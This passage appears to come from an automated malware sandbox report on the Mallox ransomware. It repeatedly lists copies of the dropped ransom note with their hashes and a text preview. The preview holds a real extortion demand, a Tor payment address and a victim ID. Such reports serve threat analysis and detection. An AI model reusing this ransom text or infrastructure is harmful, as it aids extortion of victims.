                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\SystemAppData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\TempState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\RoamingState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SystemAppData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
